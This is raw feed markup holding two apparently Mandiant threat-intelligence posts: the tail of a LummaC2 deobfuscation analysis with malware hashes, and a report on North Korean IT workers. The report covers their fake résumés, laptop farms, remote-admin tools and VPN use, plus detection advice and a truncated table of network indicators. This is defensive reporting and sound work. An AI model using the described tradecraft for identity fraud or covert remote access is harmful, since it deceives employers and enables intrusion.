h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig22.max-1000x1000.png" alt="Decompiler view of the subroutine at the binary&#x27;s entrypoint after deobfuscation"> </a> <figcaption class="article-image__caption "><p data-block-key="8nnet">Figure 22: Decompiler view of the subroutine at the binary's entrypoint after deobfuscation</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img 
src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig23.max-1000x1000.png" alt="Disassembly view of the subroutine at address 0x41EE50 before deobfuscation"> </a> <figcaption class="article-image__caption "><p data-block-key="8nnet">Figure 23: Disassembly view of the subroutine at address 0x41EE50 before deobfuscation</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig24.max-1000x1000.png" alt="Decompiler view of the subroutine at address 0x41EE50 after deobfuscation"> </a> <figcaption class="article-image__caption "><p data-block-key="8nnet">Figure 24: Decompiler view of the subroutine at address 0x41EE50 after deobfuscation</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">As shown in these figures, the original instructions are now readily apparent, free from the clutter of dispatcher blocks added by the obfuscator. The control flow, once obscured by indirect jumps, is now clearly visible and can be recovered and decompiled using IDA Pro. After deobfuscating all protected functions, we can now analyze the original program to comprehend its capabilities and behaviors.</span></p> <h2><span style="vertical-align: baseline;">Conclusion</span></h2> <p><span style="vertical-align: baseline;">In this blog post, we have explored the inner workings of LummaC2's obfuscation technique using indirect jumps to manipulate control flow. By leveraging backward slicing and symbolic execution, we have been able to consistently identify the original instructions and eliminate dispatcher instructions added by the obfuscator. 
Furthermore, we have discussed strategies for deobfuscation, including rebuilding the original function from the recovered control flow and addressing relocation challenges.</span></p> <p><span style="vertical-align: baseline;">While this blog post focuses on deobfuscating LummaC2 protected subroutines, the power of backward slicing as a binary analysis technique extends well beyond this specific case. We hope our exploration of deobfuscating LummaC2 through the use of backward slicing has provided valuable insights to fellow analysts tackling similar challenges in the ever-evolving realm of reverse engineering and malware analysis.</span></p> <h2><span style="vertical-align: baseline;">Indicators of Compromise</span></h2> <p><span style="vertical-align: baseline;">A </span><a href="https://www.virustotal.com/gui/collection/fde9be4abcbec24b6f5c47fb819c0d9adeb84e5113a4b5058142350ae58f7a95" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence Collection</span></a><span style="vertical-align: baseline;"> featuring indicators of compromise (IOCs) related to the activity described in this post is now available.</span></p> <h3><span style="vertical-align: baseline;">Host-Based IOCs</span></h3></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div 
style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: 
hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">MD5</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Associated Malware Family</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">d01e27462252c573f66a14bb03c09dd2</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">LUMMAC.V2</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">5099026603c86efbcf943449cd6df54a</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">LUMMAC.V2</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">205e45e123aea66d444feaba9a846748</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">LUMMAC.V2</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> 
</div> </div> </div> </div></div></description><pubDate>Wed, 25 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/lummac2-obfuscation-through-indirect-control-flow/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>LummaC2: Obfuscation Through Indirect Control Flow</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/lummac2-obfuscation-through-indirect-control-flow/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Staying a Step Ahead: Mitigating the DPRK IT Worker Threat</title><link>https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat/</link><description><div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Codi Starks, Michael Barnhart, Taylor Long, Mike Lombardi, Joseph Pisano, Alice Revelli</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Strategic Overview of IT Workers</span></h2> <p><span style="vertical-align: baseline;">Since 2022, Mandiant has tracked and reported on IT workers operating on behalf of the Democratic People's Republic of Korea (DPRK). 
These workers pose as non-North Korean nationals to gain employment with organizations across a wide range of industries</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">in order to </span><a href="https://ofac.treasury.gov/media/923126/download?inline" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">generate revenue for the North Korean regime</span></a><span style="vertical-align: baseline;">, </span><span style="vertical-align: baseline;">particularly to evade sanctions and fund its weapons of mass destruction (WMD) and ballistic missile programs.</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">A U.S. government </span><a href="https://ofac.treasury.gov/media/923126/download?inline" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">advisory</span></a><span style="vertical-align: baseline;"> in 2022 noted that these workers have also leveraged privileged access obtained through their employment in order to enable malicious cyber intrusions, an observation corroborated by Mandiant and </span><a href="https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">other organizations</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">IT workers employ various methods for evading detection. We have observed the operators leverage </span><a href="https://www.justice.gov/opa/media/1320161/dl?inline" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">front companies</span></a><span style="vertical-align: baseline;"> to disguise their true identities; additionally, U.S. 
government </span><a href="https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">indictments</span></a><span style="vertical-align: baseline;"> </span><a href="https://www.justice.gov/opa/pr/justice-department-disrupts-north-korean-remote-it-worker-fraud-schemes-through-charges-and" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">show</span></a><span style="vertical-align: baseline;"> that non-North Korean</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">individuals, known as “facilitators,” play a crucial role in enabling these IT workers in their efforts to seek and maintain employment. These individuals provide essential services that include, but are not limited to, laundering money and/or cryptocurrency, receiving and hosting company laptops at their residences, using stolen identities for employment verification, and accessing international financial systems. </span></p> <p><span style="vertical-align: baseline;">This report aims to increase awareness of the DPRK's efforts to obtain employment as IT workers and shed light on their operational tactics for obtaining employment and maintaining access to corporate systems. Understanding these methods can help organizations better detect these sorts of suspicious behaviors earlier in the hiring process. 
In this blog post we’ve included a sampling of the types of behaviors identified during our incident response engagements, and strategies for the detection and disruption of DPRK IT worker activity.</span></p> <h2><span style="vertical-align: baseline;">UNC5267</span></h2> <p><span style="vertical-align: baseline;">Mandiant tracks IT worker operations we have identified in various environments as UNC5267.</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">UNC5267 remains highly active in the present day, posing an ongoing threat. Some sources suggest that the origins of these operations can be traced back to 2018. Importantly, UNC5267 is not a traditional, centralized threat group. IT workers consist of individuals sent by the North Korean government to live primarily in China and Russia, with smaller numbers in Africa and Southeast Asia. Their mission is to secure lucrative jobs within Western companies, especially those in the U.S. tech sector.</span></p> <p><span style="vertical-align: baseline;">UNC5267 gains initial access by using stolen identities to apply for various positions or by being brought in as a contractor. UNC5267 operators have primarily applied for positions that offer 100% remote work. Mandiant observed the operators engaging in work of varying complexity and difficulty spanning disparate fields and sectors. It is not uncommon for a DPRK IT worker to be working multiple jobs at once, pulling in multiple salaries on a monthly basis. One American facilitator working with the IT workers </span><a href="https://www.justice.gov/opa/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">compromised more than 60 identities</span></a><span style="vertical-align: baseline;"> of U.S. persons, impacted more than 300 U.S. 
companies, and generated at least $6.8 million in revenue for the overseas IT workers from in or around October 2020 until October 2023.</span></p> <p><span style="vertical-align: baseline;">UNC5267’s objectives include:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Financial gain through illicit salary withdrawals from compromised companies</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Maintaining long-term access to victim networks for potential future financial exploitation</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Potential use of access for espionage or disruptive activity (though this hasn't been definitively observed)</span></p> </li> </ul> <h2><span style="vertical-align: baseline;">Incident Response Observations</span></h2> <p><span style="vertical-align: baseline;">Mandiant's incident response engagements to date have primarily observed DPRK IT workers functioning within the scope of their job responsibilities. However, the remote workers often gain elevated access to modify code and administer network systems. This heightened level of access granted to fraudulent employees presents a significant security risk.</span></p> <p><span style="vertical-align: baseline;">Mandiant has identified a substantial number of DPRK IT worker resumes used to apply for remote positions. 
In one resume from a suspected IT worker, the email address<span style="vertical-align: baseline;">—</span>previously observed in IT worker-related activities<span style="vertical-align: baseline;">—</span>was also linked to a fabricated software engineer profile hosted on Netlify, a platform often used for quickly creating and deploying websites. The profile claimed proficiency in multiple programming languages and included fake testimonials with stolen images from high-ranking professionals, likely stolen from CEOs, directors, and other software engineers’ LinkedIn profiles. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dprk-it-worker-fig1a.max-1000x1000.png" alt="Observed image of threat actor resume"> </a> <figcaption class="article-image__caption "><p data-block-key="nmflx">Figure 1: Observed image of threat actor resume (likely altered)</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Within the suspected DPRK IT worker's Netlify page, we discovered a resume accompanied by a link to another resume hosted on Google Docs, presenting a different identity. The linked resume featured a different name, phone number, and email address compared to the information on the Netlify page. Further discrepancies between the Netlify page and the linked resume included differing universities and years of attendance, as well as variations in past job titles and company work history. 
However, both of the resumes included a slight variation of the phrase “I'm less about seeing myself, I'm more about the others rely on me.”</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dprk-it-worker-fig2a.max-1000x1000.png" alt="Resume excerpt"> </a> <figcaption class="article-image__caption "><p data-block-key="nmflx">Figure 2: Resume excerpt</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dprk-it-worker-fig3.max-1000x1000.png" alt="Resume excerpt"> </a> <figcaption class="article-image__caption "><p data-block-key="nmflx">Figure 3: Resume excerpt</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">These two resumes are a small sampling of the total amount of fraudulent resumes identified by Mandiant. However, the resumes provide evidence of the DPRK IT workers utilizing multiple personas in attempts to gain employment across multiple organizations.</span></p> <p><span style="vertical-align: baseline;">A recurring characteristic of resumes utilized by UNC5267 is the use of addresses based in the United States coupled with education credentials from universities outside of North America, frequently in countries such as Singapore, Japan, or Hong Kong. While possible, Mandiant noted that the acceptance rate for foreign students at many of the universities is low. 
This discrepancy may serve to hinder potential North American employers from verifying or contacting these overseas institutions regarding the applicant. Mandiant has also observed that the universities listed on the background check may not align with the candidate’s education background stated in their resume, including time of enrollment and completed degree programs. Furthermore, UNC5267's resumes often exhibit significant overlap with publicly available resumes or are heavily reused across multiple UNC5267 personas. </span></p> <p><span style="vertical-align: baseline;">To accomplish their duties, UNC5267 often remotely accesses victim company laptops situated within a laptop farm. These laptop farms are typically staffed with a single facilitator who is paid monthly to host numerous devices in one location. Mandiant has identified evidence that these laptops are often connected to an IP-based Keyboard Video Mouse (KVM) device, although a recurring theme across these incidents is the installation of multiple remote management tools on victim corporate laptops immediately following shipment to the farm. These tools indicate that the individual is connecting to their corporate system remotely via the internet, and may not be geographically located in the city, state, or even country in which they report to reside. 
The following is a list of remote administration tools identified during Mandiant engagements:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">GoToRemote / LogMeIn</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">GoToMeeting</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Chrome Remote Desktop </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">AnyDesk </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">TeamViewer</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">RustDesk</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Connections to these remote management solutions primarily originated from IP addresses associated with Astrill VPN, likely originating from China or North Korea. Lastly, feedback from team members and managers who spoke with Mandiant during investigations consistently highlighted behavior patterns, such as reluctance to engage in video communication and below-average work quality exhibited by the DPRK IT worker remotely operating the laptops. </span></p> <p><span style="vertical-align: baseline;">Another common characteristic identified across Mandiant’s engagements was that DPRK IT workers typically claimed to live in one location, but requested laptop shipment to another location (laptop farm or outside enablement entity). 
We have observed the DPRK IT workers using the location associated with the stolen identity used for employment, including the stolen driver’s license, which often doesn’t match the location where the laptop is ultimately shipped and stored. </span></p> <h2><span style="vertical-align: baseline;">Detection Methods</span></h2> <p><span style="vertical-align: baseline;">Mandiant highlights a number of strategies that organizations can use to identify and hinder DPRK IT worker operations based on information from trusted sources and </span><a href="https://ofac.treasury.gov/media/923131/download?inline" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">government</span></a><span style="vertical-align: baseline;"> </span><a href="https://www.ic3.gov/Media/Y2023/PSA231018" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">advisories</span></a><span style="vertical-align: baseline;">. Countering the threat posed by North Korean cyber actors requires a multifaceted approach that combines technical defenses, user awareness training, and proactive threat hunting. Key recommendations include:</span></p> <h3><span style="vertical-align: baseline;">Vetting of Job Candidates</span></h3> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Requiring stringent background checks, including the collection of biometric information for comparison against known identities via specialized background checking services, may deter the use of forgeries. 
</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Implementing careful interview processes, such as requiring cameras to be used during interviews to ensure visual appearance matches online profiles, checking that the interviewee matches the provided identification, and asking questions to establish the consistency of a candidate's responses in line with their purported background. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">U.S. government advisories and trusted third parties have additionally noted IT workers’ reluctance to turn on cameras and their use of fake backgrounds during interviews. </span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Training human resources departments to spot inconsistencies broadly and learn IT worker tactics, techniques, and procedures (TTPs).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitoring for the use of artificial intelligence (AI) to modify employment profile pictures.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Mandiant has observed multiple instances in which DPRK IT workers utilized AI to modify profile pictures. 
</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Impacted organizations have leveraged open-source </span><a href="https://isitai.com/ai-image-detector/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">tooling</span></a><span style="vertical-align: baseline;"> to determine if the image was created using AI.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Require notarized proof of identity prior to employment.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Observations of Potential Technical Indicators</span></h3> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Verify phone numbers to identify Voice over Internet Protocol (VoIP) phone numbers. The use of VoIP phone numbers is a common tactic used by UNC5267. 
</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Verify that the corporate laptop is shipped to and subsequently geolocated where the individual reports to reside during onboarding.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Mandiant has observed instances where the deployed corporate laptop was never geolocated in the location that the individual reported to reside.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor and restrict the use and installation of remote administration tools:</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Prevent any remote connections to company-issued computers that could subsequently access the corporate network.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor for uncommon remote admin tools. </span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor for multiple remote admin tools installed on one system.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor for the use of VPN services to connect to corporate infrastructure. 
IP addresses associated with VPN services, such as Astrill VPN, should be further reviewed.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor for the use of “mouse jiggling” software. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Mandiant has observed instances of DPRK IT workers using the Caffeine mouse jiggling software to remain active across several laptops and profiles. This allows for ease of use at facilitator locations, where keeping laptops on and running is key, and for the DPRK IT workers who often hold many jobs at once and need to appear online.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Request verification of the laptop serial number at the time of IT onboarding. This information should be readily available for anyone with physical possession of their corporate device. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Utilize hardware-based multi-factor authentication to enforce physical access to corporate devices.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"><span style="vertical-align: baseline;">Monitor and restrict the use of IP-based KVM devices. 
IP-based KVMs are frequently utilized by DPRK IT workers to maintain persistent remote access to corporate devices.</span></li> </ul> <h3><span style="vertical-align: baseline;">Ongoing Mitigation Strategies</span></h3> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Consider utilizing periodic mandatory spot checks where remote employees are required to go on camera. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Offer continuous education for users and employees on current threats and trends, which is critical for identifying potentially malicious activity. Provide additional training on reporting suspicious activity. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Collaborate with information-sharing communities and security vendors to stay abreast of the latest threats and mitigation strategies.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Require the use of U.S. banks for financial transactions to hinder IT worker efforts, as the acquisition of U.S. bank accounts is more difficult and entails stricter identity verification than those in many other countries. </span></p> </li> </ul> <p><span style="vertical-align: baseline;">For Google SecOps Enterprise+ customers, the IOCs listed in this blog post are available for prioritization with Applied Threat Intelligence.</span></p> <p><span style="vertical-align: baseline;">Mandiant also offers intelligence-led human-driven Custom Threat Hunt services to reveal ongoing or past threat actor activity in both cloud and on-premise environments. 
The service includes analysis tailored to the particulars of your tech stack and the threats targeting you. Learn more about <a href="https://services.google.com/fh/files/misc/custom_threat_hunt_datasheet.pdf" rel="noopener" target="_blank">Mandiant Custom Threat Hunt services</a>.</span></p> <h2><span style="vertical-align: baseline;">Outlook and Implications </span></h2> <p><span style="vertical-align: baseline;">North Korea's IT workforce, despite operating under significant constraints, presents a persistent and escalating cyber threat. The dual motivations behind their activities—fulfilling state objectives and pursuing personal financial gains—make them particularly dangerous. Their technical proficiency, coupled with sophisticated evasion tactics, poses a formidable challenge, especially for HR and recruiting teams tasked with identifying potential threats during the hiring process.</span></p> <p><span style="vertical-align: baseline;">Given their past successes and the DPRK regime's reliance on cyber operations for revenue and strategic goals, we anticipate a continued surge in sophisticated attacks and intrusions targeting businesses globally. The IT workers continue to be particularly impactful to Western organizations, with a growing number of European organizations targeted. These attacks can lead to data breaches, financial losses, intellectual property theft, and disruption of critical services.</span></p> <p><span style="vertical-align: baseline;">The activities of North Korea's IT workforce underscore the need for sustained vigilance and a proactive cybersecurity posture. While the threat is complex, a combination of robust security measures, employee awareness, and collaborative efforts can significantly enhance an organization's resilience against these malicious actors. Additionally, leveraging advanced threat detection tools and maintaining robust incident response plans are crucial for minimizing the impact of potential breaches. 
Collaboration with industry peers and cybersecurity agencies to share threat intelligence can further strengthen defenses against this evolving threat.</span></p> <p><span style="vertical-align: baseline;">Mandiant successfully operates in this effort by leveraging partnerships either publicly or privately with key organizations and victims alike. If your organization has been affected or you have information regarding DPRK cyber operations, we can help get the information to the people that need to be protected or informed. We are all in this together.</span></p> <p><span style="vertical-align: baseline;">A </span><a href="https://www.virustotal.com/gui/collection/633362a341322d562a22fc93b62fce69064bfa3ea8d5d15d112b2263a078a4ad" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence Collection</span></a><span style="vertical-align: baseline;"> featuring indicators of compromise (IOCs) related to the activity described in this post is now available for registered users.</span></p> <h2><span style="vertical-align: baseline;">Network IOCs</span></h2></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; 
width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Indicator</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">ASN</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">NetBlock</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Service</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Location</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">103.244.174.154</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">9541</span></p> </td> <td 
